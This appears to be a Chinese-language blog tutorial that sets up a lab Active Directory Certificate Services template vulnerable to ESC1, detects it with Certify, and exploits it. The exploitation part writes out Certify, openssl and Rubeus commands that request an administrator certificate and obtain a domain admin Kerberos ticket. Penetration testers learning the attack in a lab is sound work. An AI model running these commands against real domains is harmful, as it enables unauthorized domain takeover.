ADCS-ESC1漏洞环境构造与利用

原理

ESC1是ADCS中的一个漏洞,利用该漏洞可实现权限提升攻击。在 ESC1 漏洞利用中,攻击者通过一系列操作获取包含域管身份信息的证书后,利用 Rubeus.exe 工具,使用该证书获取 TGT 票据。一旦成功获取 TGT 票据,攻击者就可以利用该票据进行权限提升,访问原本只有域管理员才能访问的域控资源等,从而实现对域环境的进一步控制。

漏洞利用条件

证书注册权限:Domain Users 组具备获取证书的权限。

应用程序策略:证书具备身份验证功能,例如登记为客户端身份验证,只要证书存在用于验证的相关功能,即可满足该攻击条件。

关键标志开启:开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志,此标志允许通过_CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_声明自身身份,从而实现伪装成域管理员的目的,这是 ESC1 攻击得以实施的关键步骤。

漏洞环境构造

配置证书模板

在ADCS服务器中运行中输入certtmpl.msc打开证书模板控制台,右键复制工作站身份验证

常规

模板名称设置为ESC1(可任意填写)

使用者名称

选择在请求中提供,开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

拓展

选择应用程序策略,添加客户端身份验证

安全

加入Domain Users具有注册权限

发布证书模板

打开certsrv.msc

在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC1确定添加

漏洞环境检测

使用Certify检测有没有证书配置错误

Certify.exe find /vulnerable

当出现以下情况时,满足 ESC1 漏洞条件,即存在 ESC1 漏洞:

  1. msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT
  2. pkiextendedkeyusage:客户端身份验证
  3. Enrollment Rights:Domain Users 组可获取证书

满足上述条件,可利用证书漏洞伪装成域管理员获取更高权限。

漏洞利用

在普通域用户下,使用Certify.exe以administrator身份申请ESC1证书

Certify.exe request /ca:adcs.lutra.com\lutra-ADCS-CA /template:ESC1 /altname:administrator

将申请的证书复制保存为cert.pem,使用openssl转为cert.pfx,密码为空即可

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

使用Rubeus请求域管administrator的TGT

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.110.127 /ptt

在执行的时候出现报错,KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

原因是没有将域控制器身份验证证书导入到域控中

将域控制器身份验证注册后再次执行,成功导入票据

导入票据后,已经有权限访问域控目录

相关推荐
Hacker_Nightrain4 小时前
【网络安全】从零开始的CTF生活
安全·web安全·生活
小许不内卷6 小时前
TCPDF 任意文件读取漏洞:隐藏在 PDF 生成背后的危险
网络·安全
JiaJunRun8 小时前
Java Collections工具类面试题
java·开发语言·windows·学习·安全
是小崔啊9 小时前
MongoDB03 - MongoDB索引,事务和安全
数据库·安全·mongodb
Bug.ink10 小时前
SeaCMS V9海洋影视管理系统报错注入
网络·安全
白初&10 小时前
安全面试5
安全·面试·职场和发展
JiaJunRun11 小时前
Java集合体系结构面试题
java·开发语言·windows·学习·安全
邹飞鸣12 小时前
若依前后端分离框架修改3.8.9版本(重点在安全框架讲解与微信小程序登录集成)
安全·微信小程序·小程序
不会玩技术的技术girl12 小时前
深入解析淘宝订单接口:设计、调用与安全实践
服务器·数据库·安全